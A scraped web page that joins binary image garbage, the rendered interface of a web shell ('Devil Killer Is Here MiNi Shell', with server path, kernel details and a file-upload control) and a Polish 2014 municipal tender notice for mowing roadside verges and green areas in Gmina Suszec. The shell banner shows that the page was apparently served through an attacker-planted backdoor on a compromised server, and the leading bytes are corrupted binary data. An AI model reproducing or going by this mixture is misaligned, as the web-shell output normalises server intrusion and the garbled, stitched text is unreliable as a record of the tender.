JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140424/89035-N-2014.html

<p class="kh_header"><b>Suszec: Wykaszanie i utrzymanie gminnych terenów zielonych i poboczy dróg na terenie Gminy Suszec w 2014 r.</b><br>
<b>Numer ogłoszenia: 89035 - 2014; data zamieszczenia: 24.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suszec , ul. Lipowa 1, 43-267 Suszec, woj. śląskie, tel. 32 44993050, faks 32 4493051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suszec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykaszanie i utrzymanie gminnych terenów zielonych i poboczy dróg na terenie Gminy Suszec w 2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZGODNIE Z PKT 3 SIWZ:
3.	Opis przedmiotu zamówienia:

3.1	Przedmiotem zamówienia jest realizacja zadania pn.: Wykaszanie i utrzymanie gminnych terenów zielonych i poboczy dróg na terenie Gminy Suszec w 2014 r., zwanego dalej zamówieniem.

3.2	Zakres przedmiotu zamówienia: 
a)	zamówienie obejmuje swym zakresem:
-	roboty przygotowawcze, które wykonawca wykonuje przed rozpoczęciem koszenia, do robót tych zalicza się:
wybranie z trawy kamieni, gruzu, puszek metalowych lub innych 
zanieczyszczeń,
wygrabienie liści, które spadły z drzew,
rozgarnięcie kretowisk,
wycięcie jednorocznych samosiewów i odrostów wokół drzew,
wywóz zebranych zanieczyszczeń na wysypisko publiczne lub składowiska własne, po uzgodnieniu miejsca wywozu z Zamawiającym, 
-	koszenie poboczy dróg i terenów zielonych, w tym m.in. skarp, rowów, miejsc niedostępnych, miejsc reprezentacyjnych oraz pozostałych działek gminnych na terenie Gminy Suszec, wykaszanych zgodnie z wytycznymi określonymi w specyfikacji technicznej - zał. nr 8 do SIWZ, a także zgodnie z postanowieniami określonymi w niniejszej SIWZ,
-	dostawę i pracę sprzętu do koszenia,
-		uprzątnięcie skoszonej trawy i chwastów z jezdni i chodników, odtransportowanie sprzętu,
-	kontrolę i pomiary dopuszczalnej wysokości trawy po jej skoszeniu.
		
b)	Zamówienie składa się z dwóch zadań (części):
1)	Zadanie nr 1:	Wykaszanie i utrzymanie gminnych poboczy dróg oraz miejsc reprezentacyjnych na terenie Gminy Suszec.
Usługi objęte tym zadaniem będą świadczone na terenach o łącznej powierzchni: 292.315,70 m2.
Lokalizację terenów podlegających koszeniu i utrzymaniu przedstawiono na mapkach lokalizacyjnych - zał. nr 10.01 - 10.9 do SIWZ, natomiast zestawienie długości i powierzchni (w tym średniej szerokości koszenia) poboczy i miejsc reprezentacyjnych do koszenia wykazano odpowiednio w załącznikach nr 9.1 i 9.2 do SIWZ.
Szerokość koszenia podana w załączniku 9.1 i 9.2 została uśredniona. Do powierzchni koszenia wchodzą zarówno odcinki o mniejszej jak i większej szerokości niż podana szerokość średnia. W przypadku występowania rowów przydrożnych koszeniu podlega pas od krawędzi jezdni do przeciwskarpy włącznie. Po przeprowadzonych pracach należy uprzątnąć zanieczyszczenia z jezdni i chodników.
Zamawiający, dla zadania nr 1, wymaga wykonania nie mniej niż czterech pełnych koszeń na poboczach dróg gminnych, wymienionych w zał. nr 9.1 do SIWZ w okresie obowiązywania umowy i nie mniej niż pięciu pełnych koszeń w miejscach reprezentacyjnych wymienionych w zał. 9.2 do SIWZ, w okresie obowiązywania umowy, w terminach określonych w zał. 6 do SIWZ.

2)	Zadanie nr 2: Wykaszanie i utrzymanie pozostałych działek gminnych na terenie Gminy Suszec. 
	Usługi objęte tym zadaniem będą świadczone na terenach o łącznej powierzchni:  130.000,00 m2. Zestawienie powierzchni pozostałych terenów gminnych objętych przedmiotem zamówienia wykazano w zał. nr 11 do SIWZ. 
                     Decyzję dotyczącą zakresu i terminu świadczenia przedmiotu zamówienia na terenach objętych zadaniem nr 2 podejmuje zamawiający. 
Zamawiający, dla zadania nr 2, dla szacowanych powierzchni przedstawionych w zał. nr 11 do SIWZ, termin i szczegółowy zakres prac wskazuje na bieżąco w protokole przekazań i odbiorów pozostałych terenów gminnych objętych przedmiotem zamówienia - załącznik nr 12 do SIWZ.
3.3	Warunki szczegółowe:
a)	koszenie trawy ma być prowadzone w takich odstępach czasu, aby wysokość trawy nie była większa niż 20 cm (dotyczy tylko zadania nr 1),
b)	wysokość trawy po skoszeniu może maksymalnie wynosić 5 cm,
c)	prace obejmują także wycinkę jednorocznych samosiewów i odrostów,
d)	uprzątnięcie zanieczyszczeń z jezdni i chodników po przeprowadzonych pracach.
3.4	Szczegółowy opis przedmiotu zamówienia stanowi: 
a)	specyfikacja techniczna - zał. nr 8 do SIWZ,
b)	zestawienie długości i powierzchni poboczy do koszenia - zał. nr 9.1,
c)	zestawienie długości i powierzchni miejsc reprezentacyjnych do koszenia - zał. nr 9.2,
d)	mapki lokalizacyjne - pobocza i miejsca reprezentacyjne - zał. nr 10.01 - 10.9.
e)	zestawienie powierzchni pozostałych terenów gminnych objętych przedmiotem zamówienia - zał. nr 11
f)	protokół przekazań i odbiorów pozostałych terenów gminnych objętych przedmiotem zamówienia - zał. nr 12.

3.5	Opis przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV):

45233141-9 Roboty w zakresie konserwacji dróg
77314100-5 Usługi w zakresie trawników

3.6	Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki wykonawcy wymienione w istotnych postanowieniach umowy - stanowiących załącznik nr 2 do SIWZ. Wykonawca jest zobowiązany do ich uważnego przeanalizowania i zapoznania się z zakresem przedmiotu zamówienia. Zaleca się dokonanie wizji w terenie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 77.31.41.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJACY NIE WYMAGA ZŁOŻENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy, stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy, stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w sytuacji, gdy wykonawca wykaże, że dysponuje:

1)	wykaże, że dysponuje potencjałem technicznym do wykonania zamówienia, tj.: 

Dla zadania nr 1:
-	kosiarką wysięgnikową bijakową - min. 1 szt.:
kosiarki wysięgnikowej na ramieniu o długości min. 5m, doczepnej do pojazdu (nośnika), do koszenia dużych powierzchni, jak: pobocza lub pasy drogowe poza koroną drogi, a także na skarpach i przeciwskarpach, 
Uwaga! ZAKAZUJE SIĘ STOSOWANIA NOŻY TNĄCYCH MŁOTKOWYCH!!!
oraz
-	kosiarką ręczną - min. 2 szt.:
kosiarka żyłkowa, spalinowa do koszenia w miejscach niedostępnych, takich jak np.: pod barierami, przy ogrodzeniach, znakach, pachołkach oraz innych urządzeniach drogowych,


Dla zadania nr 2:
-	kosiarką ręczną - min. 1 szt.:
kosiarka żyłkowa, spalinowa do koszenia w miejscach niedostępnych, takich jak np.: pod barierami, przy ogrodzeniach, znakach, pachołkach oraz innych urządzeniach drogowych,
oraz jedno z poniższych urządzeń:
-	kosiarką wysięgnikową bijakową - min. 1 szt.:
kosiarki wysięgnikowej na ramieniu o długości min. 5m, doczepnej do pojazdu (nośnika), do koszenia dużych powierzchni, 
Uwaga! ZAKAZUJE SIĘ STOSOWANIA NOŻY TNĄCYCH MŁOTKOWYCH!!!

lub

-	kosiarką rotacyjną - min. 1 szt.:
doczepna do pojazdu (nośnika), do koszenia dużych powierzchni płaskich,

2)	 potwierdzi, że zastosowane do realizacji zamówienia urządzenia techniczne, odpowiadają parametrom określonym w pkt. 1),  w sposób określony w pkt. 8.2.3  SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy, stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia z art. 22 ust. 1 ustawy, na podstawie art. 44 ustawy, stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>ZGODNIE Z PKT. 8.2.5-8.2.13 SIWZ:
5.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
6.	Dokumenty, o których mowa w pkt 8.2.1 i 8.2.2 SIWZ muszą być przedstawione w formie oryginału lub kopii poświadczonej (na każdej zapisanej stronie kopii) za zgodność z oryginałem przez wykonawcę, z zastrzeżeniem pkt 8.2.6 - 8.2.10 SIWZ. 
Za konieczne a jednocześnie wystarczające będzie złożenie na kopii własnoręcznego podpisu poprzedzonego dopiskiem: za zgodność z oryginałem przez osobę(-y) uprawnioną(-e) do składania oświadczeń woli w imieniu wykonawcy. 
Za osoby uprawnione do składania oświadczeń woli w imieniu wykonawców uznaje się osoby wymienione jako uprawnione do składania oświadczeń woli:
a)	w prowadzonych przez sądy rejestrach, 
b)	w CEiDG,  
c)	osoby legitymujące się odpowiednim pełnomocnictwem,
d)	 uchwałach lub umowach spółki (dot. spółki cywilnej).
7.	Wypełnione załączniki nr 1, 3, 5 i 6 do SIWZ należy złożyć w oryginale.
8.	Jeżeli upoważnienie do podpisania i złożenia oferty nie wynika z dokumentów złożonych w ofercie, do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kopii potwierdzonej notarialnie.
9.	W przypadku składania jednej oferty przez dwa lub więcej podmiotów (wykonawców ubiegających się wspólnie o udzielenie zamówienia np. konsorcja, spółki cywilne) oferta spełniać musi następujące wymagania:
-	oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
-	przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia pełnomocnictwa w formie oryginału lub kopii potwierdzonej notarialnie, w przypadku ustanowienia pełnomocnika, oraz wypisu z umowy spółki cywilnej lub uchwały wspólników (w oryginale lub kopii poświadczonej za zgodność), w celu przedstawienia zakresu i sposobu reprezentacji wykonawcy w postępowaniu,
-	wykonawcy występujący wspólnie (np. konsorcjum firm), zobowiązani są do załączenia pełnomocnictwa w formie oryginału lub kopii potwierdzonej notarialnie, w którym wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z  art. 23 ust. 2 ustawy,
-	treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
-	pełnomocnictwo musi być załączone do oferty i podpisane przez upełnomocnionych przedstawicieli wszystkich wykonawców lub samych wykonawców,
-	wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem,
-	wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu np. nazwa i adres Wykonawcy należy wpisać dane wykonawców występujących wspólnie, a nie pełnomocnika wykonawców.
10.	W przypadku składania jednej oferty przez dwa lub więcej podmiotów (wykonawców ubiegających się wspólnie o udzielenie zamówienia np. konsorcja, spółki cywilne) dokumenty określone w pkt 8.2.1 lit. b) - d) i 8.2.3 będą oceniane łącznie, pozostałe dokumenty określone w pkt. 8.2.2 lit. a) - c) wykonawcy składają z osobna; oświadczenie wymagane zgodnie z  pkt. 8.2.1 lit. a) SIWZ winno zostać złożone przez każdego wykonawcę z osobna lub przez pełnomocnika w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.
11.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
12.	Wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia.
13.	ZAMAWIAJĄCY, W CELU OCENY, CZY WYKONAWCA BĘDZIE DYSPONOWAŁ ZASOBAMI INNYCH PODMIOTÓW W STOPNIU NIEZBĘDNYM DLA NALEŻYTEGO WYKONANIA ZAMÓWIENIA ORAZ OCENY, CZY STOSUNEK ŁĄCZĄCY WYKONAWCĘ Z TYMI PODMIOTAMI GWARANTUJE RZECZYWISTY DOSTĘP DO ICH ZASOBÓW, ŻĄDA ZŁOŻENIA W SZCZEGÓLNOŚCI:
a)	PISEMNEGO (W ORYGINALE) ZOBOWIĄZANIA tych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b Pzp), zawierającego w treści informacje dotyczące w szczególności: 
-	zakresu mających zostać udostępnionymi wykonawcy zasobów innego podmiotu,
-	 sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
-	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
-	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Uwaga: WYMAGANE POWYŻEJ INFORMACJE, MOGĄ BYĆ ZAWARTE W INNYCH DOKUMENTACH ZŁOŻONYCH WRAZ Z W/W ZOBOWIĄZANIEM DO OFERTY. 
ZGODNIE Z PKT. 14 A-D SIWZ:
a)	wykonawca może złożyć jedną ofertę,
b)	ofertę należy złożyć zgodnie z treścią zał. nr 1 do SIWZ; oferta winna być podpisana przez osoby (osobę) uprawnione do składania oświadczeń woli w imieniu wykonawcy (podpis(y) winien być opatrzony pieczęcią imienną osoby (osób) uprawnionych do składania oświadczeń woli w imieniu wykonawcy, a w przypadku braku pieczęci należy złożyć czytelny podpis określający imię i nazwisko w/w osoby (osób), 
c)	wraz z ofertą należy złożyć wypełniony formularz wyceny prac, stanowiący zał. 6 do SIWZ, zgodnie z postanowieniami określonymi w pkt. 16 SIWZ, 
d)	jeżeli upoważnienie osób podpisujących ofertę nie wynika bezpośrednio z dokumentów dołączonych do oferty (tj. nie wynika wprost z dokumentów stwierdzających status prawny wykonawcy), to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kopii potwierdzonej notarialnie, zgodnie z postanowieniami określonymi w pkt 8.2.6, 8.2.8 i 8.2.9 SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZGODNIE Z PKT.21.2-21.4 SIWZ:
21.2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
1.	ZMIANY OGÓLNE:
a)	zmiana adresu/siedziby/konta/firmy Zamawiającego/Wykonawcy,
b)	zmiana osób występujących po stronie Zamawiającego/Wykonawcy,
c)	zmiana będąca skutkiem poprawy oczywistej omyłki,
d)	zmiany wynikające z zapisów §5 zał. nr 2 do SIWZ.

2.	INNE ZMIANY.
a)	Możliwa jest zmiana terminu wykonania umowy, ze względu na:
-	przedłużenie procedury przetargowej,
-	działania osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron (protesty, listy, petycje, itp.), 
-	zmiany powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację umowy po dacie jej podpisania,
b)	Zamawiający na podstawie art. 144 ustawy dopuści zmianę umowy, m.in. dotyczącą przedmiotu, wynagrodzenia wykonawcy, umówionego terminu wykonania zamówienia, również w następujących przypadkach:
-	zmiana wysokości wynagrodzenia brutto w przypadku zmiany w okresie  obowiązywania umowy stawki podatku VAT (wartość netto pozostaje bez zmian),
-	zmianę wysokości wynagrodzenia wykonawcy wynikającą z postanowień określonych w §8 zał. nr 2 do SIWZ, 
-	działania sił natury, uznanego za stan klęski żywiołowej,
-	wystąpienia niesprzyjających warunków atmosferycznych, uniemożliwiających kontynuowanie robót, jednak nie dłużej, niż o czas trwania tych niesprzyjających warunków,
-	jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie robót przez Zamawiającego,
-	wystąpienia konieczności wykonania zamówienia dodatkowego w rozumieniu art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych (Dz. U. z 2013r. poz. 907 ze zm.), którego realizacja będzie miała wpływ na termin wykonania przedmiotu umowy,
-	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, a w szczególności terminu realizacji zamówienia.

21.3.		Zamawiający nie przedłuży terminu zakończenia umowy, jeśli przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.

21.4.	Określa się następujący tryb dokonywania zmian postanowień umowy:
1.	Sposób inicjowania zmian:
a)	Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany, niezwłocznie po zajściu okoliczności uzasadniającej zmianę,
b)	Wspólne podjęcie decyzji przez obie strony, zatwierdzone protokołem z ustaleń.
2.	Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.). 
3.	W rezultacie dokonania czynności opisanych powyżej może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.suszec.iap.pl/pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY SUSZEC
UL. LIPOWA 1
43-267 SUSZEC.</p>
